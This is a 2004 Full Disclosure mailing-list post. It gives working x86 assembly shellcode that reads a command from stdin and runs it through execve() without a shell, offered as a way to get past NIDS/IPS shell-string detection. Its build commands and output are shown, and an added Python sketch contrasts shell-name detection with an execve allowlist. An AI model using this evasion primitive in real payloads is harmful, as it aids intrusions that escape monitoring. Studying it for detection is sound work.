Full Disclosure mailing list archives

Re: No shell => secure?
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)

Hello Srs.!

We don't need a shell. A shellcode uses system calls,
and the shellcode can be the shell.

See the following code:

-------------- noshell.s --------------
#Assembly example that simulates a shell.
#Without using any shell, it is the shell. :)
#Nash Leon - nashleon () yahoo com br
#
#Note: it only takes a filename of 7 bytes.

_start:

#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80


#execve(buffer)
pushl %ecx
popl   %esi
movl   %esi,0x8(%esi) 
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)  
movl   $0xb,%eax
movl   %esi,%ebx 
leal   0x8(%esi),%ecx
#leal   0xc(%esi),%edx 
movl $0x0, %edx
int    $0x80                


#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------

This source uses read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that it is possible to create
a shellcode that executes commands without
using a shell (/bin/bash, sh, zsh, tcsh, etc).

It is useful when a NIDS/IPS interacts with
a shell wrapper, waiting for a string in the
interface, capturing an attack.

In this sample only 7 bytes are permitted
as the path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074

$ ./noshell
/bin/ls
noshell  noshell.o  noshell.s

So, Srs., a shell is not necessary to exploit
a system. NIDS/IPS can use a wrapper on the system
call execve() for security, but it is still possible
to break this resource.

Sorry for my poor English.

Best regards,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/
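
Added example, not part of the original message: a detection sketch contrasting a rule that alerts only on shell names with a rule that alerts on any execve() by a service account outside an allowlist. The log lines are constructed, modelled on a subset of auditd SYSCALL fields; the uid 33 service account, the pids and the /usr/bin/php allowlist entry are assumptions.

```python
import re

# Constructed records modelled on a subset of auditd SYSCALL fields (assumption:
# exe= names the image after a successful execve). arch=40000003 is i386, where
# execve is syscall 11, the 0xb that noshell.s loads into %eax.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1089399700.101:40): arch=40000003 syscall=11 success=yes pid=812 uid=33 exe="/usr/bin/php"
type=SYSCALL msg=audit(1089399706.220:41): arch=40000003 syscall=11 success=yes pid=790 uid=33 exe="/bin/ls"
type=SYSCALL msg=audit(1089399709.004:42): arch=40000003 syscall=11 success=yes pid=1500 uid=1000 exe="/bin/bash"
type=SYSCALL msg=audit(1089399711.650:43): arch=40000003 syscall=3 success=yes pid=801 uid=33 exe="/usr/sbin/httpd"
type=SYSCALL msg=audit(1089399715.310:44): arch=40000003 syscall=11 success=yes pid=795 uid=33 exe="/bin/sh"
"""

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/tcsh"}


def execve_events(log):
    """Yield parsed records for successful i386 execve calls only."""
    for line in log.splitlines():
        rec = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if (rec.get("type"), rec.get("arch"), rec.get("syscall"),
                rec.get("success")) == ("SYSCALL", "40000003", "11", "yes"):
            yield rec


def shell_name_alerts(log):
    """Shell-string style rule: alert only when the executed image is a shell."""
    return [(r["pid"], r["exe"]) for r in execve_events(log) if r["exe"] in SHELLS]


def service_exec_alerts(log, service_uids, allowed):
    """Policy rule: a service account may execve only allowlisted images."""
    return [(r["pid"], r["exe"]) for r in execve_events(log)
            if r["uid"] in service_uids and r["exe"] not in allowed]


if __name__ == "__main__":
    print("shell-name rule:", shell_name_alerts(SAMPLE_LOG))
    print("service policy :", service_exec_alerts(SAMPLE_LOG, {"33"}, {"/usr/bin/php"}))
```

On the sample, the shell-name rule misses the /bin/ls execution by uid 33 and fires on an ordinary user's /bin/bash, while the service policy reports both the /bin/ls and the /bin/sh executions by the service account.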
